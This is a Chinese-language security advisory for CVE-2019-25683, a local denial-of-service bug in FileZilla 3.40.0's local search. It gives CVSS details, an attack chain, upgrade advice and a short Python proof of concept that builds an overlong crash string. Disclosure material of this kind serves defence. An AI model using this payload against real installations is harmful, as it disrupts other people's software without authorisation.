CVE-2019-25683 CVSS 6.2 中危

CVE-2019-25683 FileZilla本地搜索拒绝服务漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25683

漏洞类型

拒绝服务

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FileZilla

漏洞概述

FileZilla 3.40.0版本在本地搜索功能中存在拒绝服务漏洞。由于程序对输入的路径字符串校验不严，本地攻击者可提交特定格式的恶意路径（包含384个'A'及特定后缀）触发应用程序崩溃。此漏洞无需用户交互，攻击成功后会导致应用程序不可用，影响系统可用性。

技术细节

该漏洞位于FileZilla 3.40.0的本地搜索模块中。当应用程序处理搜索目录路径时，未正确验证输入字符串的长度，导致缓冲区溢出或内存破坏。攻击者需在本地环境操作FileZilla，在搜索目录字段输入由384个字符'A'、紧接'BBBB'和'CCCC'序列构成的恶意字符串。当搜索操作初始化时，程序试图解析该超长字符串，触发底层异常从而导致进程崩溃。根据CVSS 3.1评分，该漏洞攻击向量为本地（AV:L），无需权限（PR:N）且无用户交互（UI:N），主要造成高可用性影响（A:H），但不影响机密性和完整性。

攻击链分析

STEP 1

访问本地主机

攻击者获取运行FileZilla 3.40.0的主机访问权限。

STEP 2

构造恶意Payload

生成包含384个'A'及特定后缀的畸形路径字符串。

STEP 3

触发搜索功能

在FileZilla的本地搜索目录框中输入Payload并启动搜索。

STEP 4

应用程序崩溃

FileZilla处理异常输入失败，触发拒绝服务导致程序退出。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2019-25683
# This script generates the malicious payload string.
# To reproduce: Copy the output and paste it into the FileZilla 'Local search' directory field, then start the search.

def generate_payload():
    # Payload structure: 384 'A' characters followed by 'BBBB' and 'CCCC'
    payload = 'A' * 384 + 'BBBB' + 'CCCC'
    return payload

if __name__ == "__main__":
    exploit_string = generate_payload()
    print("[*] Malicious Payload Generated:")
    print(exploit_string)
    print("[*] Paste this string into the FileZilla search directory field to trigger the crash.")

影响范围

FileZilla 3.40.0

防御指南

临时缓解措施

目前建议用户尽快将FileZilla更新到修复了该问题的后续版本。在未升级前，应加强对运行FileZilla设备的物理安全管理，避免未授权人员接触终端进行输入操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表